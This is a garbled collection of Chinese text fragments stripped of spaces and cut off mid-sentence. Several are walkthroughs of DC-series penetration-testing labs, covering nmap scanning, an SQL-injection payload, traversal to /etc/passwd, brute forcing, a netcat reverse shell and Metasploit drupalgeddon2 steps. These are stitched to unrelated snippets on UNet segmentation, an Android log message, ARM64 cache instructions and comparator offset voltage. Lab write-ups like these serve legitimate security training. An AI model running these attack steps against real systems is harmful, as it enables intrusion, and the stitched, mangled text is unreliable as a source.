1.信息收集扫描存活主机sudoarp-scan-l扫描主机开放端口nmap-p-192.168.42.155扫描主机开放端口的具体服务nmap-p80,7744-sV-A192.168.42.15580端口是网页，7744是SSH日常扫描指纹whatweb192.168.42.1552.漏洞挖掘访问网站，发现无法访问，猜测为hosts问题改写host文件vim/etc/hosts192.168.42.155dc-2成功访问，开始逛街点击flag，得到FLAG1没东西了，开始扫扫路径dirbhttp://dc-2/发现一个登录框，是wordpass建站模板先一个默认密码，没成功，再想想办法找到

1.信息收集扫描主机sudoarp-scan-l扫描端口，发现只有80端口nmap-p-192.168.42.150扫描80开放的服务nmap-p80-A-V192.168.42.1502.漏洞发掘访问主页面发现有查找功能，猜测此处有sql注入漏洞测试sql注入漏洞‘or1=1#获取成功，存在注入漏洞，开始利用bp开始抓包，跑sqlmap跑出了admin的账号和密码密码明显长度不太对，猜测为md5加密,在网上在线破解，得到密码admin登录，开始逛街发现下面提示，猜测有文件包含漏洞（目录穿越）不放心可以多敲几个../？file=../../../../../../../../../etc/pa

1.信息收集扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.149扫描指纹whatweb192.168.42.149查看端口详细服务nmap-A-p--v192.168.42.1492.网站分析扫描目录dirbuster浏览网站，发现都是静态页面只有contact.php有上传窗口尝试上传，发现问题copyright旁的数字发生变化，猜测thankyou.php存在文件包含包含文件为footer.php3.漏洞利用开始bp测试字段(下面没图了，bp爆破，网站日志太大，无法连接蚁剑，建议大家在此靶场不要跑bp)thankyou.php?file=/ect/pass

1.信息收集搜索到ipsudoarp-scan-l查看ip开放端口nmap-p-192.168.42.148查找指纹，没有收获查找目录，无敏感信息2.漏洞利用访问网站，发现只有登录框，猜测为弱密码或密码爆破bp爆破成功（为了节省时间，我假设知道username，爆破真的太慢了）账号密码为adminhappy进入网站，测试功能，发现命令执行漏洞bp抓包，开始利用反弹shell（在此之前要在kali中监听）nc-lvp77773.横向渗透反弹成功，得到shell在目录中查找敏感信息，找到oldpassword九头蛇爆破jimshh密码登录ssh，jim在ssh中找到charles账号密码（因为ls

1.扫描主机sudoarp-scan-l扫描端口nmap-p-192.168.42.147扫描主机指纹，发现Drupal7cms2.得到shell（2.1，2.2）只用一种即可2.1开始msf漏洞利用mfconsolesearchdrupalsearch7600useexploit/unix/webapp/drupal_drupalgeddon2setrhosts192.168.42.147run2.2脚本exp得到反弹shell找到脚本，修改脚本，执行脚本nc监听8888端口得到反弹shellpython-c"importpty;pty.spawn('/bin/bash')"美化一下3.me

摘要经典UNet的体系架构在某些方面存在着局限性。因此本文对其结构提出了改进。1)设计高效的CNN架构来取代编码器和解码器;2)在最先进的U-Net模型的基础上，应用残差模块来取代编码器和解码器之间的跳过连接来进行改进。医学图像分割是通过一些自动和半自动的方法来最小化感兴趣区域。。有许多传统的算法被设计来分割组织或身体器官。这些方法可以分为:基于区域的聚类、基于边缘的聚类、基于阈值的聚类和基于特征的聚类。本文提出了一种双通道UNet模型-DC-UNet方法MultiResUNet在医学图像中，感兴趣的目标对象常常有所不同，因此为了更好的分割结果，网络需要具备在不同的尺度上分析不同目标的能力。基

在我的应用程序启动后，我运行了大约十个AsyncTasks。有时模拟器需要很长时间才能启动这些任务。发生这种情况时，我会在日志cat中看到以下消息:D/dalvikvm(1983):threadid=8:撤消后仍然挂起(sc=1dc=1s=Y)当模拟器快速执行时，不会出现此消息。奇怪的是，这种行为今天发生了变化，没有任何修改。由于我已经明确地为模拟器分配了512mb内存，它不再非常慢~5分钟，现在是~5秒。在真实设备上，我的执行速度从来没有这么慢。我想了解这条日志猫消息的含义。我知Prop有指定id的线程已暂停并且在此状态下不工作。但为什么？撤消后？(sc=1dc=1s=Y)是什么意思

文章目录ARM64DC与IC指令上篇文章：ARM常见汇编指令学习8-dsbsy指令及dsb参数介绍ARM64DC与IC指令AArch64指令集中有两条关于缓存维护（cachemaintenance）的指令，分别是IC和DC。IC是用于指令缓存操作；DC是用于数据缓存操作。IC和DC指令都属于系统指令（systeminstruction），系统指令还包括AT，BRB，CFP，CPP，DVP和TLBI。IC指令的语法格式如下：ICic_op>,{Xt>}其中，是可选的64-bit通用源寄存器。ICIALLU:表示InvalidatealltoPoU，无效化所有到PoU（PointofUnifica

比较器参数之Offsetvoltage(Vos)概念1、失调电压运放的输入失调电压包含两部分:系统失调和随机失调。前者来自于电路设计,即使电路中所有匹配器件都相同也会存在;为系统失调。（如电路钳位带来的。）后者来自于应匹配器件的失配。失调参数的计算：差动对的失调电压的计算：电流镜失配的计算：指标：共模抑制比1、当不匹配发生时，共模输出会造成差模干扰，影响输出！失配造成的共模干扰。2、有限尾电流源的抑制效果，可能在高频时共模的干扰不再受到抑制，会产生大的变化进而影响输出电压摆幅。因此共模干扰在高频时不能过大。或者低于一定值。比较器的时延仿真仿真2、蒙特卡洛仿真根据蒙特卡洛仿真来分析由于器件失配引

DC-1靶场信息收集拿到靶机后先进行端口扫描上面结果我们可以发现靶机开放了22、80、111端口既然开了80端口，我们就用浏览器访问一下查看网页源代码，发现Drupal的版本为7然后进行后台扫描发现robots.txt过程但貌似并没有找到什么可利用的东西vim那就到找一下有没有现成的drupal利用模块用一个最新的excellent的配置好靶场ip即可开始攻击，成功进入查看一下当前目录有什么发现一个flag1.txt，看一下内容提示我们找一下config配置文件进shell查看一下当前用户经网上查找，发现drupal的配置文件为settings.phpfind一下就找到了查看一下文件发现fla